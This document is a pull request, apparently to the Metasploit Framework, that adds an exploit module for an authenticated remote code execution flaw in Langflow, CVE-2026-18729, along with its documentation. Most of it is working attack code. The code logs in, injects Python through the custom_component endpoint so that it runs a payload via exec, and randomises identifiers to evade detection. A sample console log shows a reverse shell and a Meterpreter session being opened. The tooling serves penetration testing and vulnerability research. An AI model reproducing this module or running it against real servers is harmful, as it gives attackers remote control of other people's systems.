### PR TITLE
ENH: Exploit module for Langflow Authenticated Remote Code Execution vulnerability CVE-2026-18729

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
@@ -1,0 +1,49 @@
+## Vulnerable Application
+
+Langflow versions 1.11.1 and below are susceptible to authenticated remote code
+execution due to improper enforcement of security restrictions of code generation
+on the `/api/v1/custom_component` endpoint.
+
+The vulnerability affects:
+
+    * Langflow < 1.11.1 and below
+
+This module was successfully tested on:
+
+    * Langflow 1.10.0
+
+
+### Installation
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.10.0) in your VM.
+   `docker pull langflowai/langflow:1.10.0`
+4. Start the langflow container.
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  -e LANGFLOW_SUPERUSER=root \
+  -e LANGFLOW_SUPERUSER_PASSWORD=root \
+  -e LANGFLOW_AUTO_LOGIN=false \
+  langflowai/langflow:1.10.0 \
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_auth_rce_cve_2026_18729`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<langflow username> password=<langflow password>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+
+```

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
@@ -1,12 +1,15 @@
 ## Vulnerable Application
 
-Langflow versions 1.11.1 and below are susceptible to authenticated remote code
-execution due to improper enforcement of security restrictions of code generation
-on the `/api/v1/custom_component` endpoint.
+Langflow versions 1.0.0 through 1.11.1 are susceptible to authenticated
+remote code execution due to improper enforcement of security restrictions
+of code generation on the `/api/v1/custom_component` endpoint.
+
+The endpoint accepts attacker controlled code is passed to Python's `exec()`
+function that bypasses security checks enforced by other code paths.
 
 The vulnerability affects:
 
-    * Langflow < 1.11.1 and below
+    * Langflow versions 1.0.0 through 1.11.1
 
 This module was successfully tested on:
 
@@ -44,6 +47,20 @@ sudo docker run -d \
 
 
 ## Scenarios
-```
 
+```
+msf exploit(multi/http/langflow_auth_rce_cve_2026_18729) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_auth_rce_cve_2026_18729) > set USERNAME root
+USERNAME => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_18729) > set PASSWORD root
+PASSWORD => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_18729) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.10.0 detected, which appears vulnerable.
+[*] Sending stage (34544 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.3:47362) at 2026-09-09 21:06:52 -0400
+
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_18729.md
@@ -4,8 +4,8 @@ Langflow versions 1.0.0 through 1.11.1 are susceptible to authenticated
 remote code execution due to improper enforcement of security restrictions
 of code generation on the `/api/v1/custom_component` endpoint.
 
-The endpoint accepts attacker controlled code is passed to Python's `exec()`
-function that bypasses security checks enforced by other code paths.
+The endpoint accepts attacker controlled code that is then passed to Python's
+`exec()` function that bypasses security checks enforced by other code paths.
 
 The vulnerability affects:
 

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -1,0 +1,185 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI authenticated RCE',
+        'Description' => %q{
+          Langflow versions 1.11.1 and below are susceptible to authenticated
+          remote code execution due to improper enforcement of security restrictions
+          of code generation on the `/api/v1/custom_component` endpoint.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-18729'],
+          ['URL', 'https://www.ibm.com/support/pages/node/7284733']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-08-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        ),
+        OptString.new(
+          'USERNAME',
+          [true, 'Langflow login username', '']
+        ),
+        OptString.new(
+          'PASSWORD',
+          [true, 'Langflow login password', '']
+        )
+      ]
+    )
+  end
+
+  def get_token(username, password)
+    data = {
+      'username' => username,
+      'password' => password
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
+      'vars_post' => data
+    )
+
+    return unless res&.code&.between?(200, 299)
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['access_token']
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+
+    unless package.to_s.downcase == 'langflow'
+      return Exploit::CheckCode::Safe('Application is not Langflow.')
+    end
+
+    version = Rex::Version.new(version_str.to_s)
+
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    if version < Rex::Version.new('1.11.2')
+      return Exploit::CheckCode::Appears(
+        "Version #{version} detected, which appears vulnerable."
+      )
+    end
+
+    Exploit::CheckCode::Safe(
+      "Version #{version} detected, which is not vulnerable."
+    )
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    token = get_token(username, password)
+
+    if token.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
+    end
+
+    injected_code = [
+      'from langflow.custom import Component',
+      'from langflow.io import Output, MessageTextInput',
+      'from langflow.schema import Data',
+      'class PwnComponent(Component):',
+      '    display_name = "CVE-2026-18729-Probe"',
+      '    name = "PwnComponent"',
+      '    inputs = [',
+      '        MessageTextInput(',
+      '            display_name="In",',
+      '            name="input_value",',
+      '        )',
+      '    ]',
+      '    outputs = [',
+      '        Output(',
+      '            display_name="Out",',
+      '            name="out",',
+      '            method="run",',
+      '        )',
+      '    ]',
+      "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
+      '    def run(self) -> Data:',
+      '        return Data(data={"output": _out})'
+    ].join("\n")
+
+    json_body = {
+      'code' => injected_code,
+      'frontend_node' => {}
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path,
+        'api/v1/custom_component'
+      ),
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'Authorization' => "Bearer #{token}"
+      },
+      'data' => json_body.to_json
+    )
+
+    unless res&.code&.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, 'Unable to trigger the vulnerability.')
+    end
+  end
+end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -139,6 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'from langflow.custom import Component',
       'from langflow.io import Output, MessageTextInput',
       'from langflow.schema import Data',
+      '_fired = [False]',
       'class PwnComponent(Component):',
       '    display_name = "CVE-2026-18729-Probe"',
       '    name = "PwnComponent"',
@@ -172,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'api/v1/custom_component'
       ),
       'headers' => {
-        'Content-Type' => 'application/json',
+      	'Content-Type' => 'application/json',
         'Authorization' => "Bearer #{token}"
       },
       'data' => json_body.to_json

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'api/v1/custom_component'
       ),
       'headers' => {
-      	'Content-Type' => 'application/json',
+        'Content-Type' => 'application/json',
         'Authorization' => "Bearer #{token}"
       },
       'data' => json_body.to_json

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -19,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
           remote code execution due to improper enforcement of security restrictions
           of code generation on the `/api/v1/custom_component` endpoint.
 
-          The endpoint accepts attacker controlled code is passed to Python's `exec()`
-          function that bypasses security checks enforced by other code paths.
+          The endpoint accepts attacker controlled code that is then passed to Python's
+          `exec()` function that bypasses security checks enforced by other code paths.
         },
         'Author' => [
           'Richard Howe <rhowe425>'

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -110,9 +110,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe('Application is not Langflow.')
     end
 
-    version = Rex::Version.new(version_str.to_s)
-
-    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+    begin
+      version = Rex::Version.new(version_str.to_s)
+    rescue ArgumentError
+      return Exploit::CheckCode::Unknown('Failed to parse version.')
+    end
 
     if version < Rex::Version.new('1.11.2')
       return Exploit::CheckCode::Appears(

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_18729.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -15,11 +13,14 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Langflow AI authenticated RCE',
+        'Name' => 'Langflow AI Custom Component Authenticated RCE',
         'Description' => %q{
-          Langflow versions 1.11.1 and below are susceptible to authenticated
+          Langflow versions 1.0.0 through 1.11.1 are susceptible to authenticated
           remote code execution due to improper enforcement of security restrictions
           of code generation on the `/api/v1/custom_component` endpoint.
+
+          The endpoint accepts attacker controlled code is passed to Python's `exec()`
+          function that bypasses security checks enforced by other code paths.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -39,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
@@ -53,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']
@@ -130,6 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
+    vars = Rex::RandomIdentifier::Generator.new(language: :python)
 
     token = get_token(username, password)
 
@@ -137,29 +139,35 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
     end
 
+    class_name = vars[:class_name]
+    payload_method = vars[:payload_method]
+    input_display_name = vars[:input_display_name]
+    output_display_name = vars[:output_display_name]
+    class_display_name = vars[:class_display_name]
+
     injected_code = [
       'from langflow.custom import Component',
       'from langflow.io import Output, MessageTextInput',
       'from langflow.schema import Data',
       '_fired = [False]',
-      'class PwnComponent(Component):',
-      '    display_name = "CVE-2026-18729-Probe"',
-      '    name = "PwnComponent"',
+      "class #{class_name}(Component):",
+      "    display_name = '#{class_display_name}'",
+      "    name = '#{class_name}'",
       '    inputs = [',
       '        MessageTextInput(',
-      '            display_name="In",',
+      "            display_name='#{input_display_name}',",
       '            name="input_value",',
       '        )',
       '    ]',
       '    outputs = [',
       '        Output(',
-      '            display_name="Out",',
+      "            display_name='#{output_display_name}',",
       '            name="out",',
-      '            method="run",',
+      "            method='#{payload_method}',",
       '        )',
       '    ]',
       "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
-      '    def run(self) -> Data:',
+      "    def #{payload_method}(self) -> Data:",
       '        return Data(data={"output": _out})'
     ].join("\n")
 


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.11.1 and below


**Related Issue:** 
Fixes #21847 

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_auth_rce_cve_2026_18729`
4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence


## Environment

| Field | Details |
|-------|---------|
| **Operating System** |  Ubuntu 22.04 |
| **Target Software/Hardware** | langflow 1.10.0 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.10.0 |

## AI Usage Disclosure
None


## Pre-Submission Checklist

- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [ ] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)